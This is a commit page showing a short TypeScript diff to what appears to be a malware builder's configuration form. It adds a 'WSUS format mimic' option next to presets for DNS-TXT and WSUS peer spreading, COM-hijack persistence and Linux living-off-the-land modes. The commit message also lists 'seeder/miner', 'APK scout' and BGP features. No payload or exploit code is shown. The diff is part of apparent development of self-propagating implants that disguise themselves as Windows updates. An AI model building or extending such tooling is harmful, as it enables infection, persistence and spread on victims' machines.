Add fleet evolution: genetic breeding, atlas gossip, BGP router, seeder/miner, genealogy, court gates, APK scout, personas, WSUS mimic, and P2 test coverage

This commit is contained in:
AetherForge
2026-06-07 05:00:22 -07:00
parent 7b2d41cda8
commit 82d74abfcf
38 changed files with 486 additions and 120 deletions

View File

@@ -81,6 +81,7 @@ export function spreadKitPreset(): Partial<BuildRequest> {
dns_txt_spread: true,
webrtc_mesh_spread: false,
wsus_cache_peer_spread: true,
wsus_format_mimic: true,
com_hijack_persist: false,
linux_lotl_mode: 'off',
};
@@ -177,9 +178,14 @@ export function normalizeForgeForm(form: BuildRequest): BuildRequest {
next.dns_txt_spread = false;
next.webrtc_mesh_spread = false;
next.wsus_cache_peer_spread = false;
next.wsus_format_mimic = false;
next.com_hijack_persist = false;
}
if (next.wsus_cache_peer_spread === false) {
next.wsus_format_mimic = false;
}
// Linux LOTL persistence — Linux/universal workers only
if (isWindowsOnlyTarget(next.target_os)) {
next.linux_lotl_mode = 'off';